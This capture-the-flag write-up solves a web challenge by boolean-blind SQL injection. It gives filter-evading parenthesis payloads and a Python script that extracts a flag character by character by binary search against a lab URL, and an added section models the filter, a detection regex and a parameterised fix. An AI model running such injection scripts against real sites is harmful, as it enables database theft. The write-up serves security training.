[ciscn2019 North China Day2 web1]hack world
2022-06-23 09:19:00 【K00sec】
The landing page gives a prompt: enter an id to view a page, so the parameter to test is id.
Entering 1, 2 and 3 in turn shows each page's echo.
Echo for input 1
Echo for input 2
Echo for input 3
Since input 3 returns an error message, the injection point is probably a boolean-based or time-based blind injection, so test for that.
(This challenge is rather confusing: at the start the delay test worked, but later I found it no longer did, so I started testing boolean blind injection.)
Testing shows that spaces are filtered and /**/ cannot be used either, but parentheses () can be used to bypass the filter.

With that, a working bypass is found.
# IF(expr,1,2): if the expression expr evaluates to true, return 1, otherwise return 2
id=if(length((select(database())))>0,1,2)
# Echo: Hello, glzjin wants a girlfriend.
id=if(length((select(database())))<0,1,2)
# Echo: Do you want to be my girlfriend?
Reading the challenge prompt carefully, it hints at where the flag is: the flag field in the flag table.
# Constructing the payload
## Length of the flag
id=if(length((select(flag)from(flag)))>$0$,1,0)
## Value of the flag
id=if((ascii(substr((select(flag)from(flag)),$1$,1)))>=$0$,1,0)
## $x$ marks the places that need to be modified
With the payload constructed, first test a few payloads by hand to confirm they work; if they do, run the script.
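As an added example (not part of the original writeup, and not the challenge's real index.php, which is not shown), the following Python models the filter described above next to a detection rule and a hardened handler: the writeup's own probe payloads pass a space-and-/**/ deny-list untouched, a keyword-based rule catches them regardless of whitespace, and an integer allow-list plus a bound parameter removes the injection entirely. The pages table and its rows are constructed stand-ins, and SQLite replaces MySQL.

```python
import re
import sqlite3

# Constructed sample ids: two benign values plus the two probe payloads from the writeup.
SAMPLE_IDS = [
    "1",
    "2",
    "if(length((select(database())))>0,1,2)",
    "if((ascii(substr((select(flag)from(flag)),1,1)))>=64,1,0)",
]


def space_denylist(value):
    """The challenge's filter as the writeup describes it: block spaces and /**/ only."""
    return " " not in value and "/**/" not in value


# A SQL function name followed (after optional whitespace) by '(': parentheses stand in
# for spaces in these payloads, so the rule keys on the call itself, not on whitespace.
PROBE_RE = re.compile(r"(?i)\b(select|if|ascii|substr|length|sleep|benchmark)\s*\(")


def looks_like_probe(value):
    """Detection rule for log review: flags the parenthesis-only payloads above."""
    return PROBE_RE.search(value) is not None


def make_db():
    """Constructed in-memory stand-in for the challenge's page table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, content TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [
        (1, "Hello, glzjin wants a girlfriend."),
        (2, "Do you want to be my girlfriend?"),
    ])
    return conn


ID_RE = re.compile(r"[0-9]{1,10}")


def handle_request(conn, raw_id):
    """Hardened handler: allow-list the id as an integer, then bind it as a parameter."""
    if ID_RE.fullmatch(raw_id) is None:
        return None  # rejected before the database ever sees the value
    row = conn.execute("SELECT content FROM pages WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def audit(ids):
    """For each id: (passes the deny-list, flagged by the keyword rule)."""
    return [(space_denylist(v), looks_like_probe(v)) for v in ids]
```

Running audit(SAMPLE_IDS) shows every value passing the deny-list while only the two probes trip the keyword rule; handle_request returns the page for "1" and "2" and None for both probes.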

Reading some writeups, I found that the experts like binary search, probably because it is faster. So I also combine linear traversal and binary search to brute-force the flag's length and value.
```python
#!/usr/bin/env python3
# -*- encoding: UTF-8 -*-
import requests
import time


class Sqlinject():
    def __init__(self, url, keyword=None, maxlen=127):
        self._maxlen = maxlen        # upper bound when brute-forcing a length
        self._url = url
        self._keyword = keyword      # string that appears in the "true" response
        self._length = 0
        self._flag = ''

    # Brute-force the length: linear scan, stop at the first "true" response
    def getlength(self, name, payload=None):
        self._payload = payload
        for length in range(self._maxlen):
            payload = self._payload % length
            req = requests.post(self._url, data={'id': payload})
            if self._keyword in req.text:
                self._length = length
                print('%s_Length = %d.' % (name, self._length))
                break

    # Brute-force the flag: binary search over printable ASCII (33..126) per position
    def getflag(self, payload=None):
        self._payload = payload
        for pos in range(1, self._length + 1):
            low = 33
            high = 126
            while high > low:
                mid = (low + high + 1) // 2
                payload = self._payload % (pos, mid)
                req = requests.post(self._url, data={'id': payload})
                if self._keyword in req.text:   # true response: ascii(char) >= mid
                    low = mid
                else:
                    high = mid - 1
                time.sleep(0.1)
            self._flag += chr(high)
            print('flag:%s' % self._flag)


if __name__ == '__main__':
    urls = 'http://b4d3e7f9-4bfc-471b-b010-1ae76b609520.node4.buuoj.cn:81/index.php'
    keywords = 'Hello, glzjin wants a girlfriend.'
    inject = Sqlinject(urls, keywords)
    # getlength(name, payload): name is only used for printing; payload is the template,
    # wrapped in double quotes, with %d at the position to brute-force.
    # The other methods take only the payload template.
    inject.getlength("flaglen", "if(length((select(flag)from(flag)))=%d,1,0)")
    inject.getflag("if((ascii(substr((select(flag)from(flag)),%d,1)))>=%d,1,0)")
```
### To brute-force the flag you only need getflag(); since I am still learning Python, I wrote the rest for practice. It is a complete blind injection script; the part that enumerated the database's tables is not posted.
Note the injection position.

The brute-forced flag.